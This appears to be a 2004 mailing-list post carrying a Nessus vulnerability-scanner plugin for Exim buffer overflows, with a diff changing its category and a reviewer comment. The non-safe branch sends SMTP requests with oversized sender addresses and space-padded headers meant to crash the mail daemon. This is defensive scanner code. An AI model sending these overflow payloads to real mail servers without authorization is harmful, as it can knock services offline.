[Plugins-writers] Change Script category for exim_mult_overflow.nasl

From: Sarju Bhagat (sarju@private)
Date: Mon May 17 2004 - 07:56:13 PDT


    Hi,
    
    I have updated the category.
    
    Regards
    
    -- 
    Sarju Bhagat
    Software Engineer
    Westpoint Limited
    Albion Wharf, 19 Albion Street,
    Manchester, M1 5LN
    England
    Tel: +44 (0)161 237 1028
    Fax: +44 (0)161 237 1031
    email: sarju@private
    web: www.westpoint.ltd.uk 
    
    
    
    #
    # (C) Tenable Network Security
    #
    
    if(description)
    {
      # Plugin identity and bookkeeping.
      script_id(12232);
      script_version ("$Revision: 1.5 $");
      script_copyright(english:"This script is Copyright (C) 2004 Tenable Network Security");

      # ACT_MIXED_ATTACK: the non-safe branch of this plugin sends SMTP
      # transactions that can crash the daemon; with safe_checks() only the
      # banner is matched.
      script_category(ACT_MIXED_ATTACK);

      # Names shown in reports.
      name["english"] = "Exim Multiple Overflows";
      summary["english"] = "Exim Multiple Overflows";
      script_name(english:name["english"]);
      script_summary(english:summary["english"]);

      # Long-form finding text, including the banner-only false-positive
      # warning for safe_checks mode.
      desc["english"] = "
    The remote host is running a version of the Exim MTA which is vulnerable
    to several remote buffer overflows.  Specifically, if either
    'headers_check_syntax' or 'sender_verify = true' is in the exim.conf
    file, then a remote attacker may be able to execute a classic stack-
    based overflow and gain inappropriate access to the machine.
    
    *** If you are running checks with safe_checks enabled, this may be a
    false positive as only banners were used to assess the risk! ***
    
    It is known that Exim 3.35 and 4.32 are vulnerable.
    
    Solution : Upgrade to Exim latest version
    
    Risk Factor : High";
      script_description(english:desc["english"]);

      # Report family, with English and French labels.
      family["english"] = "SMTP problems";
      family["francais"] = "Problèmes SMTP";
      script_family(english:family["english"], francais:family["francais"]);

      # Run after service discovery, against the SMTP service (default port 25).
      script_dependencie("find_service.nes");
      script_require_ports("Services/smtp", 25);
      exit(0);
    }
    
    #
    # The script code starts here
    #
    
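    include("smtp_func.inc");
    
    # Locate the SMTP service: use the discovered port, fall back to 25, and
    # stop quietly if the port is not open.
    port = get_kb_item("Services/smtp");
    if(!port) port = 25;
    if (! get_port_state(port)) exit(0);
    
    # Only hosts whose greeting identifies Exim are examined further.
    banner = get_smtp_banner(port:port);
    if(!banner)exit(0);
    if (! egrep(string:banner, pattern:"Exim") ) exit(0);
    
    
    if (safe_checks()) {
        # Banner-only assessment: reports Exim 0.x-2.x, 3.00-3.35 and
        # 4.00-4.32.  This trusts the advertised version string, which is why
        # the plugin description flags this path as a possible false positive.
        if(egrep(pattern:"220.*Exim ([0-2]\.|3\.([0-2][0-9]|3[0-5])|4\.([0-2][0-9]|3[0-2]))", string:banner))
            security_hole(port);
        exit(0);
    } else {
        # Non-safe checks.  Each one sends a complete SMTP transaction and
        # treats a missing reply as evidence that the daemon died.  Any other
        # cause of silence (read timeout, connection limit, an MTA dropping
        # the session) produces the same report, so findings from this branch
        # should be confirmed.  Every socket is closed on every exit path,
        # including the ones that call security_hole(), so nothing is left
        # open behind the report.
        soc = open_sock_tcp(port);
        if (!soc) exit(0);
        banner = smtp_recv_line(socket:soc);
        if ( ! banner ) { close(soc); exit(0); }
    
        # non-safe check # 1
        req = string("HELO x.x.x.x\r\n");
        req += string("MAIL FROM: ", crap(300), "@nessus.org\r\n\r\n");
        req += string("RCPT TO: web@localhost\r\n");
        req += string("DATA\r\n");
        req += string("blahblah\r\n.\r\nQUIT\r\n");
        send(socket:soc, data:req);
        r = recv_line(socket:soc, length:512);
        if (!r) { close(soc); security_hole(port); exit(0); }
        close(soc);
    
        # non-safe check # 2
        # A refused connection at this point is taken to mean check # 1
        # brought the daemon down; a per-source connection limit or a
        # restart in progress would look identical.
        req = string("HELO x.x.x.x\r\n");
        req += string("MAIL FROM: nessus@private\r\n");
        req += string("RCPT TO: web@localhost\r\n");
        req += string("DATA\r\n");
        req += string("From", crap(data:" ", length:275), ":nessus\r\n");
        req += string("blahblah\r\n.\r\nQUIT\r\n");
        soc = open_sock_tcp(port);
        if (!soc) { security_hole(port); exit(0); }
        banner = smtp_recv_line(socket:soc);
        if ( ! banner ) { close(soc); exit(0); }
        send(socket:soc, data:req);
        r = recv_line(socket:soc, length:512);
        if (!r) { close(soc); security_hole(port); exit(0); }
        close (soc);
    
        # non-safe check # 3
        # NOTE(review): this request is byte-for-byte the same as check # 2.
        # It is kept so the plugin's observable behaviour is unchanged, but if
        # a different header was intended here it has not been written.
        req = string("HELO x.x.x.x\r\n");
        req += string("MAIL FROM: nessus@private\r\n");
        req += string("RCPT TO: web@localhost\r\n");
        req += string("DATA\r\n");
        req += string("From", crap(data:" ", length:275), ":nessus\r\n");
        req += string("blahblah\r\n.\r\nQUIT\r\n");
        soc = open_sock_tcp(port);
        if (!soc) { security_hole(port); exit(0); }
        banner = smtp_recv_line(socket:soc);
        if ( ! banner ) { close(soc); exit(0); }
        send(socket:soc, data:req);
        r = recv_line(socket:soc, length:512);
        if (!r) { close(soc); security_hole(port); exit(0); }
        close (soc);
        exit(0);
    }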
    
    
    
    
    
    *** plugins/exim_mult_overflow.nasl	Sat May  8 15:30:14 2004
    --- exim_mult_overflow.nasl	Mon May 17 15:53:27 2004
    ***************
    *** 32,38 ****
       summary["english"] = "Exim Multiple Overflows";
       script_summary(english:summary["english"]);
       
    !  script_category(ACT_GATHER_INFO);
       
       script_copyright(english:"This script is Copyright (C) 2004 Tenable Network Security");
       
    --- 32,38 ----
       summary["english"] = "Exim Multiple Overflows";
       script_summary(english:summary["english"]);
      
    !  script_category(ACT_MIXED_ATTACK);
      
       script_copyright(english:"This script is Copyright (C) 2004 Tenable Network Security");
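Review bot: The switch to ACT_MIXED_ATTACK on the `!` line is not explained anywhere in the script, and the reason only becomes visible in the non-safe branch well below this hunk, where the plugin sends transactions that can take the daemon down. A one-line comment above the call would save the next maintainer the lookup: `# ACT_MIXED_ATTACK: the non-safe branch can crash the MTA; safe_checks() falls back to banner matching`. It would also be worth saying there that, in safe mode, the result rests on the advertised version string alone, which the description already flags as a false-positive risk.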
      
    
    
    


